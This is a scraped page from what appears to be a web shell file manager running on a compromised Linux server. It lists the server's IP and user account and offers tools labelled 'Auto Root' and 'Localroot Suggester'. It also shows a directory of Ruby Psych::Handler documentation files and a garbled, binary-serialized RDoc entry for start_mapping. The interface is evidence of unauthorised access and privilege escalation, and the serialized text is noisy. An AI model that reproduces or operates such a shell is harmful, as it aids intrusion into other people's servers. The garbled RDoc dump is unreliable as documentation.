Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
Psych /
Handler /
Delete
Unzip
Name
Size
Permission
Date
Action
DumperOptions
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
alias-i.ri
770
B
-rw-r--r--
2026-04-07 17:22
cdesc-Handler.ri
1.6
KB
-rw-r--r--
2026-04-07 17:22
empty-i.ri
372
B
-rw-r--r--
2026-04-07 17:22
end_document-i.ri
792
B
-rw-r--r--
2026-04-07 17:22
end_mapping-i.ri
323
B
-rw-r--r--
2026-04-07 17:22
end_sequence-i.ri
331
B
-rw-r--r--
2026-04-07 17:22
end_stream-i.ri
331
B
-rw-r--r--
2026-04-07 17:22
event_location-i.ri
407
B
-rw-r--r--
2026-04-07 17:22
scalar-i.ri
1.66
KB
-rw-r--r--
2026-04-07 17:22
start_document-i.ri
1.17
KB
-rw-r--r--
2026-04-07 17:22
start_mapping-i.ri
1.5
KB
-rw-r--r--
2026-04-07 17:22
start_sequence-i.ri
1.49
KB
-rw-r--r--
2026-04-07 17:22
start_stream-i.ri
566
B
-rw-r--r--
2026-04-07 17:22
streaming%3f-i.ri
335
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI"start_mapping:ETI"!Psych::Handler#start_mapping;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"Called when a map starts.;To:RDoc::Markup::BlankLine o; ; [ I">+anchor+ is the anchor associated with the map or +nil+. ;TI"8+tag+ is the tag associated with the map or +nil+. ;TI"N+implicit+ is a boolean indicating whether or not the map was implicitly ;TI"started. ;TI"8+style+ is an integer indicating the mapping style.;T@o; ; [I"KSee the constants in Psych::Nodes::Mapping for the possible values of ;TI" +style+.;T@S:RDoc::Markup::Heading: leveli: textI"Example;T@o; ; [I"KHere is a YAML document that exercises most of the possible ways this ;TI"method can be called:;T@o:RDoc::Markup::Verbatim; [ I" --- ;TI"k: !!map { hello: world } ;TI"v: &pewpew ;TI" hello: world ;T:@format0o; ; [I"PThe above YAML document consists of three maps, an outer map that contains ;TI"Ktwo inner maps. Below is a matrix of the parameters sent in order to ;TI" represent these three maps:;T@o;; [ I";# anchor tag implicit style ;TI"=[nil, nil, true, 1 ] ;TI"=[nil, "tag:yaml.org,2002:map", false, 2 ] ;TI"<["pewpew", nil, true, 1 ];T;0: @fileI"#ext/psych/lib/psych/handler.rb;T:0@omit_headings_from_table_of_contents_below000[ I"#(anchor, tag, implicit, style);T@1FI"Handler;TcRDoc::NormalClass00